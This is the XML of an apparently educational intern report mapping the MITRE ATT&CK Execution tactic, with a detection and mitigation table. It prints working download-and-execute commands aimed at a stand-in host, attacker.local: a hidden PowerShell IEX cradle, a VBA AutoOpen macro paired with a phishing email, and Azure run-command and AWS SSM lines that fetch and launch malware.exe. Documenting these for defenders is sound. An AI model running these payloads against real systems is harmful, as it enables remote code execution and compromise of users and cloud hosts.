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FFCEA4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>PoC Report – Tactic: Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C85498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🧑 Author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ishan Chowdhury</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>🆔 Intern ID</w:t>
      </w:r>
      <w:r>
        <w:t>: 159</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>🧠 Team</w:t>
      </w:r>
      <w:r>
        <w:t>: SkullFaced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D4406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E43598">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>🎯 MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34F38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Tactic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/tactics/TA0002/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>TA0002 – Execution</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427F88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Techniques</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2E00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1440"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1059/001/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>T1059.001 – PowerShell</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1202F87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1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1204/002/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10F75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1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1651/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>T1651 – Cloud Administration Command</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7063176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51CD83">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>🧪 Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23487F7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510133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T1059.001 – PowerShell Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD696B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Goal</w:t>
      </w:r>
      <w:r>
        <w:t>: Use PowerShell to execute a remote malicious payload on a compromised Windows host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B30D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powershell.exe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NoProfile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ExecutionPolicy Bypass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WindowStyle Hidden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Command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"IEX (New-Object Net.WebClient).DownloadString('http://attacker.local/payload.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD9EFA">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4ED60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Expected Path</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>C:\Users\Public\payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604CC56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Purpose</w:t>
      </w:r>
      <w:r>
        <w:t>: Executes code from a remote server while bypassing execution policies and hiding the execution window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C436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A67D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T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA5843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Goal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Trick the user into opening a macro-enabled document that silently triggers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590AA2E2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Macro Code (VBA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55806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Sub AutoOpen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB3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Shell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"powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://attacker.local/loader.ps1')"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC726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End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3B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6C15B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Delivery Path</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>C:\Users\jane.doe\Documents\Reports\Q2_Budget_Update.docm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3994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Phishing Example</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sent from: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>it.support@corpdomain.com</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">To: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>jane.doe@targetcorp.com</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>Payroll Update – Urgent Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F539D">
      <w:pPr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b/>
          <w:bCs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11720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0"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1651 – Cloud Administration Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1270DABD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Azure Command Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490BE2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az vm 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command invoke \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2BF8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group SalesTeam \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEA8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name Finance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Server \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894B6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RunPowerShellScript \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253B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scripts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"Invoke-WebRequest 'http://attacker.local/malware.exe' -OutFile 'C:\ProgramData\malware.exe'; Start-Process 'C:\ProgramData\malware.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A45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17A563D"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AWS SSM Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE206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aws ssm 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command \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33906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ids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"i-0a12bc3d456e789f0"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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC66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"AWS-RunPowerShellScript"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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C379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parameters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'commands=["Invoke-WebRequest http://attacker.local/malware.exe -OutFile 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ProgramData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malware.exe", "Start-Process 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ProgramData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malware.exe"]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A7F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983865">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="default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4D9BB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>📊 Combined Attack Chain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1462"/>
        <w:gridCol w:w="6375"/>
      </w:tblGrid>
      <w:tr w14:paraId="16DF1C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3B1D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7D2E76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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F595B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F387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44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1–3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78CAB5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T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41A4C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PowerShell used to retrieve and execute remote script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E489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F6CB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4–6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D04A7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T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3598F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Macro document executes PowerShell silently on user machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="46F94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485C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7–8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222125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T1651</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3830E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API used to push and run malware inside VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05C0CF4F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="default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26CEE6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>🛡️ Detection &amp; Mitigation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7"/>
        <w:gridCol w:w="6539"/>
      </w:tblGrid>
      <w:tr w14:paraId="33D6F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E2B9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59D3CE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Defense Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="707A6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AFAC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PowerShell Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="726DF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Enable Event ID 4104, monitor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C:\Users\*\AppData\Local\Temp\*.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38E47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531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Macro Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B6F3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Block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.docm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from Internet Zone, enable Protected View</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="677FA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8926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Admin Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67CF48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 Azure/AWS API usage, restrict execution rights, enable logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B561B2A">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="default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0FBCE">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>🔗</w:t>
      </w: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FBBC4D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>🔗 References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05789AF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/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1059/001/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>MITRE T1059.001 – PowerShell</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279668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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1204/002/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>MITRE T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E408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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://attack.mitre.org/techniques/T1651/" \t "_new" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>MITRE T1651 – Cloud Admin Command</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E074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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>MITRE ATT&amp;CK Enterprise Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068775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E0586">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="10"/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2D0EA9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4F2D0E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9D698"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6399D69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8406D"/>
    <w:rsid w:val="1E58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2025-08-02T15:19:00Z</dcterms:created>
  <dc:creator>ishan</dc:creator>
  <cp:lastModifiedBy>Ishan Chowdhury</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-02T15:33:24Z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3228E66EE31C4BC5B812B69A2BF622DA_11</vt:lpwstr>
  </property>
</Properties>
</file>